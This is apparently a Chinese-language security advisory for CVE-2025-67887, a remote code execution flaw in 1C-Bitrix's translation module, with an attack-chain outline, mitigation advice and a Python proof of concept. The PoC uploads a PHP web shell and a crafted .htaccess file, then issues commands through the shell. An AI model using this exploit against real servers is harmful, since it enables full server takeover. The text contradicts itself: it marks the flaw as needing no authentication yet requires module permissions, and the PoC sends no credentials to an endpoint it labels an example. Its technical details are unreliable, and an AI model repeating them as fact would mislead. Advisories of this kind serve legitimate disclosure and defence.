CVE-2025-67887 1C-Bitrix 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-67887

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

1C-Bitrix

漏洞概述

1C-Bitrix在版本25.100.500及之前存在严重的远程代码执行漏洞。具有翻译模块SOURCE/WRITE权限的攻击者能够上传恶意PHP文件及.htaccess文件，进而导致在服务器端执行任意代码。尽管供应商声称这是预期功能，但这仍带来了极高的安全风险。

技术细节

该漏洞源于1C-Bitrix翻译模块的权限校验机制不当。当用户拥有SOURCE和WRITE权限时，系统允许直接上传PHP文件和.htaccess配置文件。攻击者利用此权限，首先上传精心构造的.htaccess文件，修改目录配置以允许解析PHP脚本。随后，攻击者上传包含恶意后门代码的PHP文件。由于Web服务器配置被修改，通过访问该PHP文件的URL即可在服务器端执行任意系统命令。尽管供应商声称这是为了方便高权限用户管理翻译页面，但缺乏有效的文件类型和内容隔离机制，使得该功能极易被滥用，导致服务器被完全控制。

攻击链分析

STEP 1

步骤1：权限获取

攻击者获取1C-Bitrix翻译模块的SOURCE和WRITE权限。

STEP 2

步骤2：上传配置文件

攻击者利用权限上传精心构造的.htaccess文件，修改目录配置以允许解析PHP脚本。

STEP 3

步骤3：上传恶意代码

攻击者上传包含恶意后门代码的PHP文件（WebShell）。

STEP 4

步骤4：执行代码

攻击者通过浏览器访问上传的PHP文件，触发代码执行，获取服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target.com/bitrix/tools/translate_upload.php" # Example endpoint
shell_name = "rce_shell.php"

# Malicious PHP code to execute system commands
php_payload = "<?php system($_GET['cmd']); ?>"

# .htaccess content to allow PHP execution in upload directory
htaccess_content = "Options +ExecCGI\nAddType application/x-httpd-php .php"

# Prepare files for upload
files = {
    'phpfile': (shell_name, php_payload, 'application/x-httpd-php'),
    'htaccess': ('.htaccess', htaccess_content, 'text/plain')
}

# Send upload request
try:
    response = requests.post(target_url, files=files)
    if response.status_code == 200:
        print("[+] Files uploaded successfully.")
        print(f"[+] Check your shell at: /upload/{shell_name}?cmd=whoami")
    else:
        print("[-] Upload failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

1C-Bitrix <= 25.100.500

防御指南

临时缓解措施

建议立即审查拥有翻译模块SOURCE/WRITE权限的用户列表，移除不必要的权限。同时，在服务器配置中禁用上传目录的脚本执行权限，直至官方发布明确的修复方案或安全配置指南。